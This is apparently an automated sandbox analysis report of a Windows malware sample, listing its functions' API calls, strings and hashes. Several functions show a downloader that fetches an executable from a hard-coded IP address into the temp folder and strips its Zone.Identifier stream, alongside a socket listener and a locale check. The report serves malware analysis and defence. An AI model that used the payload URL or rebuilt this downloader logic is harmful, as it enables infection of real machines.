                                                                                                                                    Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                    • htons.WS2_32(?), ref: 00401508
                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4174406920-0
                                                                                                                                    • Opcode ID: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                    • Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
                                                                                                                                    • Opcode Fuzzy Hash: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                    • Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
                                                                                                                                    Function 0040D770 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D782
                                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
                                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D7F4
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040D814
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D81A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 107502007-0
                                                                                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                    • Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
                                                                                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                    • Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
                                                                                                                                    Function 0040B430 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                      • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
                                                                                                                                      • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
                                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                    Strings
                                                                                                                                    • www.update.microsoft.com, xrefs: 0040B467
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                                    • Opcode ID: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                    • Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
                                                                                                                                    • Opcode Fuzzy Hash: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                    • Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
                                                                                                                                    Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3943618503-0
                                                                                                                                    • Opcode ID: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                    • Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
                                                                                                                                    • Opcode Fuzzy Hash: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                    • Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
                                                                                                                                    Function 0040F1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
                                                                                                                                    • strcmp.NTDLL ref: 0040F1D2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoLocalestrcmp
                                                                                                                                    • String ID: UKR
                                                                                                                                    • API String ID: 3191669094-64918367
                                                                                                                                    • Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                    • Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
                                                                                                                                    • Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                    • Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA
                                                                                                                                    Function 0040F560 Relevance: 73.7, APIs: 36, Strings: 6, Instructions: 231filesleepnetworkCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040F569
                                                                                                                                    • srand.MSVCRT ref: 0040F570
                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
                                                                                                                                    • strlen.NTDLL ref: 0040F59A
                                                                                                                                    • mbstowcs.NTDLL ref: 0040F5B1
                                                                                                                                    • rand.MSVCRT ref: 0040F5B9
                                                                                                                                    • rand.MSVCRT ref: 0040F5CD
                                                                                                                                    • wsprintfW.USER32 ref: 0040F5F4
                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
                                                                                                                                    • wsprintfW.USER32 ref: 0040F6F4
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F704
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F70F
                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040F730
                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040F758
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F76E
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F77B
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F788
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F795
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F7A0
                                                                                                                                    • rand.MSVCRT ref: 0040F7B5
                                                                                                                                    • Sleep.KERNEL32 ref: 0040F7C6
                                                                                                                                    • rand.MSVCRT ref: 0040F7CC
                                                                                                                                    • rand.MSVCRT ref: 0040F7E0
                                                                                                                                    • wsprintfW.USER32 ref: 0040F807
                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
                                                                                                                                    • wsprintfW.USER32 ref: 0040F844
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F854
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F85F
                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040F880
                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040F8A7
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040F8B6
                                                                                                                                    Strings
                                                                                                                                    • %s:Zone.Identifier, xrefs: 0040F838
                                                                                                                                    • %s:Zone.Identifier, xrefs: 0040F6E8
                                                                                                                                    • %s\%d%d.exe, xrefs: 0040F7FB
                                                                                                                                    • %temp%, xrefs: 0040F58B
                                                                                                                                    • %s\%d%d.exe, xrefs: 0040F5E8
                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F605
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                    • API String ID: 1632876846-2803014298
                                                                                                                                    • Opcode ID: 96f0a69f3da845a58fc131bbffdea3f28c32c868df6781a1e5befd7d1371e6b2
                                                                                                                                    • Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
                                                                                                                                    • Opcode Fuzzy Hash: 96f0a69f3da845a58fc131bbffdea3f28c32c868df6781a1e5befd7d1371e6b2
                                                                                                                                    • Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69
                                                                                                                                    Function 004064A0 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 111networkfileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004064A9
                                                                                                                                    • srand.MSVCRT ref: 004064B0
                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
                                                                                                                                    • rand.MSVCRT ref: 004064D6
                                                                                                                                    • rand.MSVCRT ref: 004064EA
                                                                                                                                    • wsprintfW.USER32 ref: 0040650F
                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
                                                                                                                                    • InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
                                                                                                                                    • CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 004065F2
                                                                                                                                    • wsprintfW.USER32 ref: 00406609
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00406619
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040662D
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040663A
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00406647
                                                                                                                                    Strings
                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
                                                                                                                                    • %s\%d%d.exe, xrefs: 00406505
                                                                                                                                    • %s:Zone.Identifier, xrefs: 004065FD
                                                                                                                                    • %temp%, xrefs: 004064CB
                                                                                                                                    • http://185.215.113.66/tdrp.exe, xrefs: 00406546
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe
                                                                                                                                    • API String ID: 2816847299-853099633
                                                                                                                                    • Opcode ID: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                    • Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
                                                                                                                                    • Opcode Fuzzy Hash: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                    • Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28
                                                                                                                                    Function 0040B850 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 546 40b850-40b867 call 40b780 549 40b869 546->549 550 40b86e-40b88a call 40b3d0 strcmp 546->550 551 40baf5-40baf8 549->551 554 40b891-40b8ad call 40b3d0 strstr 550->554 555 40b88c 550->555 558 40b8f0-40b90c call 40b3d0 strstr 554->558 559 40b8af-40b8cb call 40b3d0 strstr 554->559 555->551 566 40b90e-40b92a call 40b3d0 strstr 558->566 567 40b94f-40b96b call 40b3d0 strstr 558->567 564 40b8eb 559->564 565 40b8cd-40b8e9 call 40b3d0 strstr 559->565 564->551 565->558 565->564 576 40b94a 566->576 577 40b92c-40b948 call 40b3d0 strstr 566->577 574 40b96d-40b989 call 40b3d0 strstr 567->574 575 40b9ae-40b9c4 EnterCriticalSection 567->575 586 40b9a9 574->586 587 40b98b-40b9a7 call 40b3d0 strstr 574->587 579 40b9cf-40b9d8 575->579 576->551 577->567 577->576 582 40ba09-40ba14 call 40bb00 579->582 583 40b9da-40b9ea 579->583 595 40baea-40baef LeaveCriticalSection 582->595 596 40ba1a-40ba28 582->596 588 40ba07 583->588 589 40b9ec-40ba05 call 40df20 583->589 586->551 587->575 587->586 588->579 589->582 595->551 598 40ba2a 596->598 599 40ba2e-40ba3f call 40a740 596->599 598->599 599->595 602 40ba45-40ba62 call 40df20 599->602 605 40ba64-40ba74 602->605 606 40baba-40bad2 602->606 608 40ba80-40bab8 call 40ab60 605->608 609 40ba76-40ba7e Sleep 605->609 607 40bad8-40bae3 call 40bb00 606->607 607->595 614 40bae5 call 40b530 607->614 608->607 609->605 614->595
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                      • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                    • strcmp.NTDLL ref: 0040B880
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                    • API String ID: 2906596889-2213908610
                                                                                                                                    • Opcode ID: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                    • Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
                                                                                                                                    • Opcode Fuzzy Hash: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                    • Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE
                                                                                                                                    Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 616 401920-401947 GetTickCount WaitForSingleObject 617 401ac9-401acf 616->617 618 40194d-401964 WSAWaitForMultipleEvents 616->618 619 4019f0-401a03 GetTickCount 618->619 620 40196a-401981 WSAEnumNetworkEvents 618->620 622 401a43-401a4c GetTickCount 619->622 623 401a05-401a14 EnterCriticalSection 619->623 620->619 621 401983-401988 620->621 621->619 626 40198a-401990 621->626 627 401ab5-401ac3 WaitForSingleObject 622->627 628 401a4e-401a5d EnterCriticalSection 622->628 624 401a16-401a1d 623->624 625 401a3a-401a41 LeaveCriticalSection 623->625 629 401a35 call 401820 624->629 630 401a1f-401a27 624->630 625->627 626->619 631 401992-4019b1 accept 626->631 627->617 627->618 632 401aa1-401ab1 LeaveCriticalSection GetTickCount 628->632 633 401a5f-401a77 InterlockedExchangeAdd call 40df20 628->633 629->625 630->624 634 401a29-401a30 LeaveCriticalSection 630->634 631->619 636 4019b3-4019c2 call 4022c0 631->636 632->627 641 401a97-401a9f 633->641 642 401a79-401a82 633->642 634->627 636->619 643 4019c4-4019df call 401740 636->643 641->632 641->633 642->641 644 401a84-401a8d call 40b4f0 642->644 643->619 649 4019e1-4019e7 643->649 644->641 649->619 650 4019e9-4019eb call 401cf0 649->650 650->619
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                                    • Opcode ID: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                    • Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
                                                                                                                                    • Opcode Fuzzy Hash: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                    • Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99
                                                                                                                                    Function 0040EF70 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040EF98
                                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
                                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
                                                                                                                                    • HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F181
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F18E
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F19B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
